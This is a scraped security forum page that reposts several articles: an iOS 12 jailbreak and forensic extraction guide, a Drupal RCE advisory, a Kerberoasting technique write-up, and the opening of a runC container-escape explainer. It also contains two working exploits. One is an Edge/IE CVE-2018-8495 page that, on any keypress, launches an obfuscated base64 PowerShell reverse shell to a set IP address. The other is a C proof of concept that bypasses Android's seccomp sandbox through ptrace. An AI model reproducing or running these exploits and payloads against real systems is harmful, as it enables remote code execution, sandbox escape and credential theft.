/var/containers/Bundle/iosbinpack64/LaunchDaemons – launch daemons /var/containers/Bundle/tweaksupport – filesystem simulation where tweaks and stuff get installed Symlinks include: /var/LIB, /var/ulb, /var/bin, /var/sbin, /var/Apps, /var/libexec In addition, we expect to see some traces in various system logs. This is unavoidable with any extraction method with or without a jailbreak. The only way to completely avoid traces in iOS system logs would be imaging the device through DFU more or its likes, followed by the decryption of the data partition (which is not possible on any modern iOS device). Conclusion The rootless jailbreak is the foundation that allows us to image the file system on Apple devices running all versions of iOS from iOS 12.0 to 12.1.2. In essence, rootless jailbreaks have everything that forensic experts need, and bundles none of the unwanted stuff included with full jailbreaks. The rootless jailbreak grants access to /var instead of / which makes it safer and easier to remove without long lasting consequences. While not fully forensically sound, rootless jailbreak is much closer to offering a clean extraction compared to classic “full jailbreaks”. Sursa: https://blog.elcomsoft.com/2019/02/ios-12-rootless-jailbreak/
- 1 reply
-
- 2
-
-
Physical Extraction and File System Imaging of iOS 12 Devices February 21st, 2019 by Oleg Afonin The new generation of jailbreaks has arrived for iPhones and iPads running iOS 12. Rootless jailbreaks offer experts the same low-level access to the file system as classic jailbreaks – but without their drawbacks. We’ve been closely watching the development of rootless jailbreaks, and developed full physical acquisition support (including keychain decryption) for Apple devices running iOS 12.0 through 12.1.2. Learn how to install a rootless jailbreak and how to perform physical extraction with Elcomsoft iOS Forensic Toolkit. Jailbreaking and File System Extraction We’ve published numerous articles on iOS jailbreaks and their connection to physical acquisition. Elcomsoft iOS Forensic Toolkit relies on public jailbreaks to gain access to the device’s file system, circumvent iOS security measures and access device secrets allowing us to decrypt the entire content of the keychain including keychain items protected with the highest protection class. If you’re interested in jailbreaking, read our article on using iOS 11.2-11.3.1 Electra jailbreak for iPhone physical acquisition. The Rootless Jailbreak While iOS Forensic Toolkit does not rely public jailbreaks to circumvent the many security layers in iOS, it does not need or use those parts of it that jailbreak developers spend most of their efforts on. A classic jailbreak takes many steps that are needed to allow running third-party software and installing the Cydia store that are not required for physical extraction. Classic jailbreaks also remount the file system to gain access to the root of the file system, which again is not necessary for physical acquisition. For iOS 12 devices, the Toolkit makes use of a different class of jailbreaks: the rootless jailbreak. Rootless jailbreak has significantly smaller footprint compared to traditional jailbreaks since it does not use or bundle the Cydia store. Unlike traditional jailbreaks, a rootless jailbreak does not remount the file system. Most importantly, a rootless jailbreak does not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak after the acquisition without requiring a system restore to return the system partition to its original unmodified state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. Note: Physical acquisition of iOS 11 devices makes use of a classic (not rootless) jailbreak. More information: physical acquisition of iOS 11.4 and 11.4.1 Steps to Install rootlessJB If you read our previous articles on jailbreaking and physical acquisition, you’ve become accustomed to the process of installing a jailbreak with Cydia Impactor. However, at this time there is no ready-made IPA file to install a rootless jailbreak in this manner. Instead, you can either compile the IPA from the source code (https://github.com/jakeajames/rootlessJB3) or follow the much simpler procedure of sideloading the jailbreak from a Web site. To install rootlessJB, perform the following steps. Note: rootlessJB currently supports iPhone 6s, SE, 7, 7 Plus, 8, 8 Plus, iPhone X. Support for iPhone 5s and 6 has been added but still unstable. Support for iPhone Xr, Xs and Xs Max is expected and is in development. On the iOS device you’re about to jailbreak open ignition.fun in Safari. Select rootlessJB by Jake James. Click Get. The jailbreak IPA will be sideloaded to your device. Open the Settings app and trust the newly installed Enterprise or Developer certificate. Note: a passcode (if configured) is required to trust the certificate. Tap rootlessJB to launch the app. Leave iSuperSU and Tweaks options unchecked and tap the “Jailbreak” button. You now have unrestricted access to the file system. Imaging the File System In order to extract data from an Apple device running iOS 12, you will need iOS Forensic Toolkit 5.0 or newer. You must install a jailbreak prior to extraction. Launch iOS Forensic Toolkit by invoking the “Toolkit-JB” command. Connect the iPhone to the computer using the Lightning cable. If you are able to unlock the iPhone, pair the device by confirming the “Trust this computer?” prompt and entering device passcode. If you cannot perform the pairing, you will be unable to perform physical acquisition. You will be prompted to specify the SSH port number. By default, the port number 22 can be specified by simply pressing Enter. From the main window, enter the “D” (DISABLE LOCK) command. This is required in order to access protected parts of the file system. From the main window, enter the “F” (FILE SYSTEM) command. You will be prompted to enter the root password. By default, the root password is ‘alpine’. You may need to enter the password several times. The file system image will be dumped as a single TAR archive. Wait while the file system is being extracted. This can be a lengthy process. When the process is finished, disconnect the device and proceed to analyzing the data. Decrypting the Keychain Physical acquisition is the only method that allows decrypting all keychain items regardless of their protection class. In order to extract (and decrypt) the keychain, perform the following steps (assuming that you have successfully paired and jailbroken the device). Launch iOS Forensic Toolkit by invoking the “Toolkit-JB” command. Connect the iPhone to the computer and specify the SSH port number (as described above). You will be prompted to enter the root password. By default, the root password is ‘alpine’. You may need to enter the password several times. From the main window, enter the “D” (DISABLE LOCK) command. This is required in order to access protected parts of the file system. Now enter the “K” (KEYCHAIN) command. You will be prompted for a path to save the keychain XML file. Specify iOS version (obviously, the second option). Enter ‘alpine’ when prompted for a password. The content of the keychain will be extracted and decrypted. When the process is finished, disconnect the device and proceed to analyzing the data. Note: if you see an error message asking to unlock the device, unlock the iPhone and make sure to use the “D” command to disable screen lock. Analyzing the Data You can use Elcomsoft Phone Viewer to analyze the TAR file. In order to view the content of the keychain, you’ll need Elcomsoft Phone Breaker. Sursa: https://blog.elcomsoft.com/2019/02/physical-extraction-and-file-system-imaging-of-ios-12-devices/
-
Este o intrebare buna si este dificil de raspuns. Depinde de multe lucruri: 1. Cel fel de termeni si conditii au 2. Legislatia care se aplica 3. Tara in care se afla serverul pe care va aparea tema de Wordpress 4. Cum reactioneaza partile implicate ...
-
Salut. Alfa. Dar nu stiu de unde sa iei.
-
Another Critical Flaw in Drupal Discovered — Update Your Site ASAP! February 21, 2019 Wang Wei Developers of Drupal—a popular open-source content management system software that powers millions of websites—have released the latest version of their software to patch a critical vulnerability that could allow remote attackers to hack your site. The update came two days after the Drupal security team released an advance security notification of the upcoming patches, giving websites administrators early heads-up to fix their websites before hackers abuse the loophole. The vulnerability in question is a critical remote code execution (RCE) flaw in Drupal Core that could "lead to arbitrary PHP code execution in some cases," the Drupal security team said. While the Drupal team hasn't released any technical details of the vulnerability (CVE-2019-6340), it mentioned that the flaw resides due to the fact that some field types do not properly sanitize data from non-form sources and affects Drupal 7 and 8 Core. It should also be noted that your Drupal-based website is only affected if the RESTful Web Services (rest) module is enabled and allows PATCH or POST requests, or it has another web services module enabled. If you can't immediately install the latest update, then you can mitigate the vulnerability by simply disabling all web services modules, or configuring your web server(s) to not allow PUT/PATCH/POST requests to web services resources. "Note that web services resources may be available on multiple paths depending on the configuration of your server(s)," Drupal warns in its security advisory published Wednesday. "For Drupal 7, resources are for example typically available via paths (clean URLs) and via arguments to the "q" query argument. For Drupal 8, paths may still function when prefixed with index.php/." However, considering the popularity of Drupal exploits among hackers, you are highly recommended to install the latest update: If you are using Drupal 8.6.x, upgrade your website to Drupal 8.6.10. If you are using Drupal 8.5.x or earlier, upgrade your website to Drupal 8.5.11 Drupal also said that the Drupal 7 Services module itself does not require an update at this moment, but users should still consider applying other contributed updates associated with the latest advisory if "Services" is in use. Drupal has credited Samuel Mortenson of its security team to discover and report the vulnerability. Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/hacking-drupal-vulnerability.html?m=1
-
<!doctype html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> </head> <body> <b>Windows Edge/IE 11 - RCE (CVE-2018-8495)</b> </br></br> <!-- adapt payload since this one connectback on an internal IP address (just a private VM nothing else sorry ;) ) --> <a id="q" href='wshfile:test/../../system32/SyncAppvPublishingServer.vbs" test test;powershell -nop -executionpolicy bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADUANgAuADEAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAg AD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEA ZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4 AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMA dAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0 AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4A TABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=;"'>Exploit-it now !</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script> </body> </html> Sursa: https://github.com/kmkz/exploit/blob/master/CVE-2018-8495.html
- 1 reply
-
- 2
-
-
Kerberoasting Revisited Will Feb 20 Rubeus is a C# Kerberos abuse toolkit that started as a port of @gentilkiwi‘s Kekeo toolset and has continued to evolve since then. For more information on Rubeus, check out the “From Kekeo to Rubeus” release post, the follow up “Rubeus — Now With More Kekeo”, or the recently revamped Rubeus README.md. I’ve made several recent enhancements to Rubeus, which included me heavily revisiting its Kerberoasting implementation. This resulted in some modifications to Rubeus’ Kerberoasting approach(es) as well as an explanation for some previous “weird” behaviors we’ve seen in the field. Since Kerberoasting is such a commonly used technique, I wanted to dive into detail now that we have a better understanding of its nuances. If you’re not familiar with Kerberoasting, there’s a wealth of existing information out there, some of which I cover in the beginning of this post. Much of this post won’t make complete sense if you don’t have a base understanding of how Kerberoasting (or Kerberos) works under the hood, so I highly recommend reading up a bit if you’re not comfortable with the concepts. But here’s a brief summary of the Kerberoasting process: A attacker authenticates to a domain and gets a ticket-granting-ticket (TGT) from the domain controller that’s used for later ticket requests. The attacker uses their TGT to issue a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form sname/host, e.g. MSSqlSvc/SQL.domain.com. This SPN should be unique in the domain, and is registered in the servicePrincipalName field of a user or computer account. During this request process, the attacker can specify what Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc). If the attacker’s TGT is valid, the DC extracts information from the TGT stuffs it into a service ticket. Then the domain controller looks up which account has the requested SPN registered in its servicePrincipalName field. The service ticket is encrypted with the hash of the account with the requested SPN registered, using the highest level encryption key that both the attacker and the service account support. The ticket is sent back to the attacker in a service ticket reply (TGS-REP). The attacker extracts the encrypted service ticket from the TGS-REP. Since the service ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this encrypted blob offline to recover the account’s plaintext password. A note on terminology. The three main encryption key types we’re going to be referring to in this post are RC4_HMAC_MD5 (ARCFOUR-HMAC-MD5, where an account’s NTLM hash functions as the key), AES128_CTS_HMAC_SHA1_96, and AES256_CTS_HMAC_SHA1_96. For conciseness I’m going to refer to these as RC4, AES128, and AES256. Also, all examples here are run from a Windows 10 client, against a Server 2012 domain controller with a 2012 R2 domain functional level. Kerberoasting Approaches Kerberoasting generally takes two general approaches: A standalone implementation of the Kerberos protocol that’s used through a device connected on a network, or via piping the crafted traffic in through a SOCKS proxy. Examples would be Meterpreter or Impacket. This requires credentials for a domain account to perform the roasting, since a TGT needs to be requested for use in the later service ticket requests. Using built-in Windows functionality on a domain-joined host (like the .NET KerberosRequestorSecurityToken class) to request tickets which are then extracted from the current logon session with Mimikatz or Rubeus. Alternatively, a few years ago @machosec realized the GetRequest() method can be used to carve out the service ticket bytes from KerberosRequestorSecurityToken, meaning we can forgo Mimikatz for ticket extraction. Another advantage of this approach is that the existing user’s TGT is used to request the service tickets, meaning we don’t need plaintext credentials or a user’s hash to perform the Kerberoasting. With Kerberoasting, we really want RC4 encrypted service ticket replies, as these are orders of magnitude faster to crack than their AES equivalents. If we implement the protocol on the attacker side, we can choose to indicate we only support RC4 during the service ticket request process, resulting in the easier to crack hash format. On the host side, I used to believe that the KerberosRequestorSecurityToken approach requested RC4 tickets by default as this is typically what is returned, but in fact the “normal” ticket request behavior occurs where all supported ciphers are supported. So why are RC4 hashes usually returned by this approach? Time for a quick detour. msDS-SupportedEncryptionTypes One defensive indicator we’ve talked about in the past is “encryption downgrade activity”. As modern domains (functional level 2008 and above) and computers (Vista/2008+) support using AES keys by default in Kerberos exchanges, the use of RC4 in any Kerberos ticket-granting-ticket (TGT) requests or service ticket requests should be an anomaly. Sean Metcalf has an excellent post titled “Detecting Kerberoasting Activity” that covers how to approach DC events to detect this type of behavior, though as he notes “false positives are likely.” The full answer of why false positives are such a problem with this approach also explains some of the “weird” behavior I’ve seen over the years with Kerberoasting. To illustrate, let’s say we have a user account sqlservice that has MSSQLSvc/SQL.testlab.local registered in its servicePrincipalName (SPN) property. We can request a service ticket for this SPN with powershell -C “Add-Type -AssemblyName System.IdentityModel; $Null=New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ‘MSSQLSvc/SQL.testlab.local’”. However, the resulting service ticket applied to the current logon session specifies RC4, despite the requesting user’s (harmj0y) TGT using AES256. As stated previously, for a long time I thought the KerberosRequestorSecurityToken approach for some reason specifically requested RC4. However, looking at a Wireshark capture of the TGS-REQ (Kerberos service ticket request) from the client we see that all proper encryption types including AES are specified as supported: The enc-part in the returned TGS-REP (service ticket reply) is properly encrypted with the requesting client’s AES256 key as we would expect. However the enc-part part we care about for Kerberoasting (contained within the returned service ticket) is encrypted with the RC4 key of the sqlservice account, NOT its AES key: So what’s going on? It turns out that this has nothing to do with the KerberosRequestorSecurityToken method. This method requests a service ticket specified by the supplied SPN so it can build an AP-REQ containing the service ticket for SOAP requests, and we can see above that it performs proper “normal” requests and states it supports AES encryption types. This behavior is due to the msDS-SupportedEncryptionTypes domain object property, something that was talked about a bit by Jim Shaver and Mitchell Hennigan in their DerbyCon “Return From The Underworld: The Future Of Red Team Kerberos” talk. This property is a 32-bit unsigned integer defined in [MS-KILE] 2.2.7 that represents a bitfield with the following possible values: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/6cfc7b50-11ed-4b4d-846d-6f08f0812919 According to Microsoft’s [MS-ADA2], “The Key Distribution Center (KDC) uses this information [msDS-SupportedEncryptionTypes] while generating a service ticket for this account.” So even if a domain supports AES encryption (i.e. domain functional 2008 and above) the value of the msDS-SupportedEncryptionTypes field on the account with the requested SPN registered is what determines the encryption level for the service ticket returned in the Kerberoasting process. According to MS-KILE 3.1.1.5 the default value for this field is 0x1C (RC4_HMAC_MD5 | AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96 = 28) for Windows 7+ and Server 2008R2+. This is why service tickets for machines nearly always use AES256, as the highest mutually supported encryption type will be used in a Kerberos ticket exchange. We can confirm this the result of doing a dir \\primary.testlab.local\C$ command followed by Rubeus.exe klist : However, this property is only set by default on computer accounts, not user accounts. If this property is not defined, or is set to 0, [MS-KILE] 3.3.5.7 tells us the default behavior is to use a value of 0x7, meaning RC4 will be used to encrypt the service ticket. So in the previous example for the MSSQLSvc/SQL.testlab.local SPN that’s registered to the user account sqlservice we received a ticket using the RC4 key. If we select “This account supports AES [128/256] bit encryption” in Active Directory Users and Computers, then the msDS-SupportedEncryptionTypes is set to 24, specifying only AES 128/256 encryption should be supported. When I first was looking at this, I assumed that this meant that since the msDS-SupportedEncryptionTypes value was non-null, and the RC4 bit was NOT present, that if you specify only RC4 when requesting a service ticket (via the /tgtdeleg flag here) for an account configured this way the exchange would error out. But guess what? We still get an RC4 (type 23) encrypted ticket that we can crack! A Wireshark capture confirms that RC4 is the only supported etype in the request, and that the ticket enc-part is indeed encrypted with RC4. ¯\_(ツ)_/¯ I’m assuming that this is for failsafe backwards compatibility reasons, and I ran this scenario in multiple test domains with the same result. However someone else I asked to recreate wasn’t able to, so I’m not sure if I’m missing something or if this accurately reflects normal domain behavior. If anyone has any more information on this, or is/isn’t about to recreate, please let me know! Why does the above matter? If true, it implies that there doesn’t seem to be an easy way to disable RC4_HMAC on user accounts. This means that even if you enable AES encryption for user accounts with servicePrincipalName fields set, these accounts are still Kerberoastable with the hacker-friendly RC4 flavor of encryption keys! After a bit of testing, it appears that if you disable RC4 at the domain/domain controller level as described in this post, then requesting a RC4 service ticket for any account will fail with KDC_ERR_ETYPE_NOTSUPP. However, TGT requests will no longer work with RC4 either. As this might cause lots of things to break, definitely try this in a lab environment first before making any changes in production. Sidenote: the msDS-SupportedEncryptionTypes property can also be set for trustedDomain objects that represent domain trusts, but it is also initially undefined. This is why inter-domain trust tickets end up using RC4 by default: However, like with user objects, this behavior can be changed by modifying the properties of the trusted domain object, specifying that the foreign domain supports AES: This sets msDS-SupportedEncryptionTypes on the trusted domain object to a value of 24 (AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96), meaning that AES256 inter-domain trust tickets will be issued by default: Trying to Build a Better Kerberoast Due to the way we tend to execute engagements, we often lean towards abusing host-based functionality versus piping in our own protocol implementation from an attacker server. We often times operate over high-latency command and control, so for complex multi-party exchanges like Kerberos our personal preference has traditionally been the KerberosRequestorSecurityToken approach for Kerberoasting. But as I mentioned in the first section, this method requests that highest supported encryption type when requesting a service ticket. For user accounts that have AES enabled, this default method will return ticket with an encryption type of AES256 (type 18 in the hash): Now, an obvious alternative method for Rubeus’ Kerberoasting would be to allow an existing TGT blob/file to be specified that would then be used in the ticket requests. If we have a real TGT and are implementing the raw TGS-REQ/TGS-REP process and extracting out the proper encrypted parts manually, we can specify whatever encryption type support we want when issuing the service ticket request. So if we have AES-enabled accounts, we can still get an RC4 based ticket to crack offline! This approach is in fact now implemented in Rubeus with the /ticket:<blob/file.kirbi> parameter for the kerberoast command. So what’s the disadvantage here? Well, you need a ticket-granting-ticket to build the raw TGS-REQ service ticket request, so you need to either a) be elevated on a system and extract out another user’s TGT or b) have a user’s hash that you use with the asktgt module to request a new TGT. If you’re curious why a user can’t extract out a usable version of their TGT without elevation, check out the explanation in the “Rubeus — Now With More Kekeo” post. The solution is @gentilkiwi’s Kekeo tgtdeleg trick, that uses the Kerberos GSS-API to request a “fake” delegation for a target SPN that has unconstrained delegation enabled (e.g. cifs/DC.domain.com). This was previously implemented in Rubeus with the tgtdeleg command. This approach allows us to extract a usable TGT for the current user, including the session key. Why don’t we then use this “fake” delegation TGT when performing out TGS-REQs for “vulnerable” SPNs, specifying RC4 as the only encryption algorithm we support? The new kerberost /tgtdeleg option does just that! There have also been times in the field where the default KerberosRequestorSecurityToken Kerberoasting method has just failed- we’re hoping that the /tgtdeleg option may work in some of these situations. If we want to go a bit further and avoid the possible “encryption downgrade” indicator, we can search for accounts that don’t have AES encryption types supported, and then state we support all encryption types in the service ticket request. Since the highest supported encryption type for the results will be RC4, we’ll still get crackable tickets. The kerberoast /rc4opsec command executes the tgtdeleg trick and filters out any of these AES-enabled accounts: If we want the opposite and only want AES enabled accounts, the /aes flag will do the opposite LDAP filter. While we don’t currently have tools to crack tickets that use AES (and even once we do, speeds will be thousands of times slower due to the AES key derivation algorithms), progress is being made. Another advantage of the /tgtdeleg approach for Kerberoasting is that since we’re building and parsing the TGS-REQ/TGS-REP traffic manually, the service tickets won’t be cache on the system we’re roasting from. The default KerberosRequestorSecurityToken method results in a service ticket cached in the current logon session for every SPN we’re roasting. The /tgtdeleg approach results in a single additional cifs/DC.domain.com ticket being added to the current logon session, minimizing a potential host-based indicator (i.e. massive numbers of service tickets in a user’s logon session). As a reference, in the README I built a table comparing the different Rubeus Kerberoasting approaches: As a final note, Kerberoasting should work much better over domain trusts as of this commit. Two foreign trusted domain examples have been added to the kerberoast section of the README. Conclusion Hopefully this cleared up some of the confusion some (like me) may have had surrounding different encryption support in regards to Kerberoasting. I’m also eager for people to try out the new Rubeus roasting options to see how they work in the field. As always, if I made some mistake in this post, let me know and I’ll correct it as soon as I can! Also, if anyone has insight on the RC4-tickets-still-being-issued-for-AES-only-accounts situation, please shoot me an email (will [at] harmj0y.net) or hit me up in the BloodHound Slack. Sursa: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
-
/* The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents: Before kernel 4.8, the seccomp check will not be run again after the tracer is notified. (This means that, on older ker‐ nels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the sec‐ comp sandbox.) Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries. The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace: ================ ===== filter 0 (164 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0010 if nr >= 0x00000069: [true +1, false +0] 0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP 0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo) 0011 if nr >= 0x00000068: [true +18, false +17] -> ret TRAP 0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer) [...] 002a if nr >= 0x00000018: [true +7, false +0] 0032 if nr >= 0x00000021: [true +3, false +0] 0036 if nr >= 0x00000024: [true +1, false +0] 0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP 00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir) 0037 if nr >= 0x00000022: [true +107, false +106] -> ret TRAP 00a2 ret ALLOW (syscalls: access) 0033 if nr >= 0x0000001a: [true +1, false +0] 0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP 00a2 ret ALLOW (syscalls: ptrace) 0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP 00a2 ret ALLOW (syscalls: getuid) [...] ================ The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace: ================ # Google Breakpad (crash reporter for Chrome) relies on ptrace # functionality. Without the ability to ptrace, the crash reporter # tool is broken. # b/20150694 # https://code.google.com/p/chromium/issues/detail?id=475270 allow isolated_app self:process ptrace; ================ Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace: ================ ===== filter 1 (194 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0002 if arch != ARM: [true +0, false +60] -> ret TRAP [...] 0074 if nr >= 0x0000007a: [true +1, false +0] 0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP 00c0 ret ALLOW (syscalls: uname) 0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP 00c0 ret ALLOW (syscalls: fsync, sigreturn, clone) [...] 004d if nr >= 0x0000001a: [true +1, false +0] 004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP 00c0 ret ALLOW (syscalls: ptrace) [...] ===== filter 2 (449 instructions) ===== 0001 if arch != ARM: [true +0, false +1] -> ret TRAP [...] 00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid) 00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace) 01c0 ret TRAP [...] 007f if nr >= 0x00000073: [true +0, false +5] 0080 if nr >= 0x00000076: [true +0, false +2] 0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone) [...] ================ Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process. To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot): ================ */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <err.h> #include <signal.h> #include <sys/ptrace.h> #include <errno.h> #include <sys/wait.h> #include <sys/syscall.h> #include <sys/user.h> #include <linux/elf.h> #include <asm/ptrace.h> #include <sys/uio.h> int main(void) { setbuf(stdout, NULL); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { pid_t my_pid = getpid(); while (1) { errno = 0; int res = syscall(__NR_gettid, 0, 0); if (res != my_pid) { printf("%d (%s)\n", res, strerror(errno)); } } } sleep(1); if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) err(1, "ptrace attach"); int status; if (waitpid(child, &status, 0) != child) err(1, "wait for child"); if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) err(1, "ptrace syscall entry"); if (waitpid(child, &status, 0) != child) err(1, "wait for child"); int syscallno; struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) }; if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace getregs"); printf("seeing syscall %d\n", syscallno); if (syscallno != __NR_gettid) errx(1, "not gettid"); syscallno = __NR_swapon; if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace setregs"); if (ptrace(PTRACE_DETACH, child, NULL, NULL)) err(1, "ptrace syscall"); kill(child, SIGCONT); sleep(5); kill(child, SIGKILL); return 0; } /* ================ If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached. For comparison, the following (a straight syscall to swapon()) fails with SIGSYS: ================ #include <unistd.h> #include <sys/syscall.h> int main(void) { syscall(__NR_swapon, 0, 0); } ================ Attaching screenshot from connectbot. I believe that a sensible fix would be to backport the behavior change that occured in kernel 4.8 to Android's stable branches. */ Sursa: https://www.exploit-db.com/exploits/46434
- 1 reply
-
- 1
-
-
Breaking out of Docker via runC – Explaining CVE-2019-5736 Feb 21, 2019 by Yuval Avrahami Last week (2019-02-11) a new vulnerability in runC was reported by its maintainers, originally found by Adam Iwaniuk and Borys Poplawski. Dubbed CVE-2019-5736, it affects Docker containers running in default settings and can be used by an attacker to gain root-level access on the host. Aleksa Sarai, one of runC’s maintainers, found that the same fundamental flaw exists in LXC. As opposed to Docker though, only privileged LXC containers are vulnerable. Both runC and LXC were patched and new versions were released. The vulnerability gained a lot of traction and numerous technology sites and commercial companies addressed it in dedicated posts. Here at Twistlock, our CTO John Morello wrote an excellent piece with all the relevant details and the mitigations offered by the Twistlock platform. Initially, the official exploit code wasn’t to be released publicly until 2019-02-18, in order to prevent malicious parties from weaponizing it before users have had some time to update. In the following days though, several people decided to release their own exploit code. That led the runC team to eventually release their exploit code earlier (2019-02-13) since – as they put it – “the cat was out of the bag”. This post aims to be a comprehensive technical deep dive into the vulnerability and it’s various exploitation methods. So What Is runC? RunC is a container runtime originally developed as part of Docker and later extracted out as a separate open source tool and library. As a “low level” container runtime, runC is mainly used by “high level” container runtimes (e.g. Docker) to spawn and run containers, although it can be used as a stand-alone tool. “High level” container runtimes like Docker will normally implement functionalities such as image creation and management and will use runC to handle tasks related to running containers – creating a container, attaching a process to an existing container (docker exec) and so on. Procfs To understand the vulnerability, we need to go over some procfs basics. The proc filesystem is a virtual filesystem in Linux that presents information primarily about processes, typically mounted to /proc. It is virtual in a sense that it does not exist on disk. Instead, the kernel creates it in memory. It can be thought of as an interface to system data that the kernel exposes as a filesystem. Each process has its own directory in procfs, at /proc/[pid]: As shown in the image above, /proc/self is a symbolic link to the directory of the currently running process (in this case pid 177). Each process’s directory contains several files and directories with information on the process. For the vulnerability, the relevant ones are: /proc/self/exe – a symbolic link to the executable file the process is running, and ; /proc/self/fd – a directory containing the file descriptors open by the process. 